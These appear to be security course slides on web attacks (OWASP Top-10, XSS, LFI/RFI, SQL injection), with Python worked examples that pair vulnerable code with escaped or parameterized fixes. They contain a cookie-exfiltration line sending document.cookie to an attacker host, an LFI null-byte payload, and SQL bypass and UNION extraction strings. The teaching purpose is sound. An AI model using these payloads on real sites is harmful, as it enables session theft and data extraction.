**Slide 1: Web Application Attacks**

- Web applications are written in many languages and frameworks, each with its own vulnerability classes.
- The main attack vectors (injection, script injection, file inclusion) are the same in concept regardless of the language.
- OWASP (Open Web Application Security Project) publishes awareness material, testing guides and tooling for secure web application development.

**Slide 2: OWASP Top-10 Security Risks (2017 edition)**

| Risk | Description |
| --- | --- |
| A1:2017 - Injection | Untrusted input (SQL, NoSQL, OS command, LDAP) is sent to an interpreter as part of a query or command. |
| A2:2017 - Broken Authentication | Credential stuffing, weak or default passwords, exposed session tokens or keys. |
| A3:2017 - Sensitive Data Exposure | Data unprotected at rest or in transit (missing or weak encryption, cleartext HTTP). |
| A4:2017 - XML External Entities (XXE) | Older or misconfigured XML parsers resolve external entity references, disclosing internal files, reaching internal hosts, or causing denial of service. |
| A5:2017 - Broken Access Control | Restrictions on what authenticated users may do are not enforced (direct object references, privilege escalation). |
| A6:2017 - Security Misconfiguration | Default configurations, open cloud storage, verbose error messages, misconfigured HTTP headers. |
| A7:2017 - Cross-Site Scripting (XSS) | Untrusted data is placed in a page without escaping; attacker script runs in the victim's browser. |
| A8:2017 - Insecure Deserialization | Deserialization of attacker-controlled objects, often leading to remote code execution. |
| A9:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries, frameworks and server software. |
| A10:2017 - Insufficient Logging & Monitoring | Attacks go undetected for lack of logging, alerting and response. |

**Slide 3: Cross-Site Scripting (XSS)**

- Unsanitized user input is written into a page and interpreted by the browser as HTML/JavaScript.
- Attacker-controlled script runs in the victim's browser within the origin of the vulnerable site, so it can read that site's DOM, cookies and storage.
- Reflected (non-persistent): the payload travels in the request (URL parameter, form field) and is echoed back; it runs when the victim opens an attacker-crafted link.
- Stored (persistent): the application saves the payload (comment, profile field, message) and serves it to every user who views the affected page.
- Impact: session cookie theft, requests issued with the victim's session (authentication bypass), redirection to attacker-controlled pages.

**Slide 4: XSS Example**

- Reflected XSS: a payload placed in a URL parameter that the page echoes without escaping.

```html
<script>alert("XSS demo")</script>
```

- Stored XSS: the same payload submitted in a field the application persists (guestbook entry, comment, profile name) and later renders to other users.

**Slide 5: Cookie Stealing via XSS**

- Injected JavaScript can make the victim's browser send its cookies to an attacker-controlled host; requesting an image is enough, no response is needed:

```javascript
new Image().src = "http://example.com/bogus.php?output=" + document.cookie;
```

- `document.cookie` does not expose cookies set with the `HttpOnly` flag, so session cookies should carry it; injected script can still act as the victim by issuing requests from within the page.

**Slide 6: File Inclusion Vulnerabilities**

- Local File Inclusion (LFI): the path given to `include`/`require` is built from user input, so an attacker can include files that already exist on the server (configuration files, logs, uploaded files).
- Remote File Inclusion (RFI): the include path can be a URL, so the attacker serves their own code to the web server. In PHP this requires `allow_url_include` to be enabled (off by default).
- Exploitability depends on the PHP version (null-byte truncation of paths was removed in PHP 5.3.4) and on the server configuration (`allow_url_include`, `open_basedir`, where uploads are stored).

**Slide 7: LFI Demonstration**

- The `lang` parameter is passed to `include` without validation; the application appends a fixed suffix to it, which is why the payload ends in a null byte.
- Payload: a previously uploaded "avatar" that actually contains PHP code is included through directory traversal; `%00` decodes to a null byte that terminates the path before the appended suffix, and `cmd=ifconfig` is read by the embedded code:

```text
../uploads/avatars/image.jpg%00&cmd=ifconfig
```

- On PHP 5.3.4 and later the null byte is rejected, the suffix stays on the path and this include fails; the log-contamination variant in the exercise is one alternative in that case.

**Slide 8: SQL Injection**

- Unsanitized user input is concatenated into a database query.
- Quote characters and SQL keywords in the input change the structure of the query, not just the data it compares against.
- Examples:
  - Bypassing authentication: `' OR '1'='1` turns the `WHERE` clause into a condition that is true for every row.
  - Extracting data with `UNION`: `' union select * from information_schema.columns --` appends a second result set (the column count and types must match the original `SELECT`; `information_schema` exists in MySQL and PostgreSQL, and MySQL requires whitespace after `--`).
- Fix: parameterized queries (prepared statements); input filtering alone is not sufficient.

**Exercise:**

- Using the OWASP Broken Web Applications project, demonstrate obtaining a shell with:
  - An LFI vulnerability in the web application with file upload.
  - An LFI vulnerability in the web application with contaminated logs.
  - An RFI vulnerability in the web application.
- Demonstrate attacks using SQL injection and Cross-Site Scripting (XSS).
- Provide documentation and proof of useful attacks in your report.
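Worked example for Slides 3 to 5 (added here; not code from the original slides). It models a reflected sink (a search page echoing its `q` parameter) and a stored sink (a guest book) in Python, feeds both the cookie-stealing snippet from Slide 5 wrapped in a `<script>` tag, and shows that HTML entity encoding at the output sink neutralizes it. The host `victim.example`, the function names and the guest-book class are assumptions made for the example; `example.com` is the attacker host used on the slide.

```python
"""Reflected and stored XSS sinks beside their output-encoded fix (constructed example)."""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# The Slide 5 cookie stealer, delivered as markup (constructed payload).
COOKIE_STEALER = (
    '<script>new Image().src="http://example.com/bogus.php?output="'
    "+document.cookie;</script>"
)

_SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def query_param(url: str, name: str) -> str:
    """Return the URL-decoded value of one query parameter ("" if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def attacker_link(victim_base: str) -> str:
    """Reflected XSS delivery: the link the attacker sends to the victim."""
    return f"{victim_base}/search?q={quote(COOKIE_STEALER)}"


def render_search_vulnerable(url: str) -> str:
    """Reflected sink: the parameter is written into the page as-is."""
    return f"<h1>Results for {query_param(url, 'q')}</h1>"


def render_search_safe(url: str) -> str:
    """Same page with HTML entity encoding applied at the output sink."""
    return f"<h1>Results for {html.escape(query_param(url, 'q'), quote=True)}</h1>"


class GuestBook:
    """Stored sink: comments are persisted and rendered to every later visitor."""

    def __init__(self, escape_output: bool) -> None:
        self.escape_output = escape_output
        self.comments = []

    def post(self, comment: str) -> None:
        # Stored verbatim; the decision that matters is made at render time.
        self.comments.append(comment)

    def render(self) -> str:
        if self.escape_output:
            items = [html.escape(c, quote=True) for c in self.comments]
        else:
            items = list(self.comments)
        return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def has_active_script(page: str) -> bool:
    """True if a real <script> tag (not an escaped &lt;script&gt;) is present in the page."""
    return _SCRIPT_OPEN.search(page) is not None


if __name__ == "__main__":
    link = attacker_link("https://victim.example")
    print("reflected, vulnerable:", has_active_script(render_search_vulnerable(link)))  # True
    print("reflected, escaped:   ", has_active_script(render_search_safe(link)))        # False
    book = GuestBook(escape_output=False)
    book.post("nice site!")
    book.post(COOKIE_STEALER)  # one malicious comment poisons the page for everyone
    print("stored, vulnerable:   ", has_active_script(book.render()))  # True
    book.escape_output = True  # the fix belongs at the sink, not at input time
    print("stored, escaped:      ", has_active_script(book.render()))  # False
```

`html.escape` is the right encoder only for HTML text and attribute values; data placed inside a `<script>` block, a URL or a CSS context needs the encoder for that context, which is why template engines apply context-aware auto-escaping. Even with the payload neutralized, set `HttpOnly` on session cookies so that a future XSS cannot read them through `document.cookie`.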
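Worked example for Slide 8 (added here; not code from the original slides). It runs the two Slide 8 payloads against string-built queries on an in-memory SQLite database and shows the parameterized versions returning nothing for the same input. The users table, its rows, and the function names are constructed for the example; because SQLite has no `information_schema`, the UNION payload is adapted to read `sqlite_master`, the equivalent catalog table, and its column list is trimmed to match the two columns of the original `SELECT`.

```python
"""SQL injection against string-built queries, beside the parameterized fix (constructed example)."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Create a small users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('alice', 'hunter2',  'admin'),
            ('bob',   'passw0rd', 'user');
        """
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Input is concatenated into the SQL text, so quotes in the input alter the query."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Parameterized query: the driver passes values separately from the SQL text."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def search_vulnerable(conn, name: str) -> list:
    """A second string-built query, used for the UNION-based extraction."""
    return conn.execute(
        f"SELECT username, role FROM users WHERE username = '{name}'"
    ).fetchall()


def search_safe(conn, name: str) -> list:
    """Parameterized counterpart of search_vulnerable."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (name,)
    ).fetchall()


# Slide 8 payloads. BYPASS makes the WHERE clause true for every row; COMMENT_OUT
# closes the string and comments out the password check; UNION_DUMP appends the
# catalog table (two columns, matching the original SELECT).
BYPASS = "' OR '1'='1"
COMMENT_OUT = "alice'--"
UNION_DUMP = "' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    conn = setup_db()
    print(login_vulnerable(conn, "anything", BYPASS))    # both users: authentication bypass
    print(login_vulnerable(conn, COMMENT_OUT, "wrong"))  # alice, password never checked
    print(login_safe(conn, "anything", BYPASS))          # []
    for name, ddl in search_vulnerable(conn, UNION_DUMP):
        print(name, "->", ddl)                           # CREATE statement of every table
    print(search_safe(conn, UNION_DUMP))                 # []
```

With the parameterized queries the payload is compared literally against the `username` and `password` columns and matches nothing; the fix is structural, not a matter of stripping quotes. On MySQL the same UNION technique reads `information_schema.columns` as on the slide, and the comment marker needs a trailing space (`-- `) or the query fails to parse.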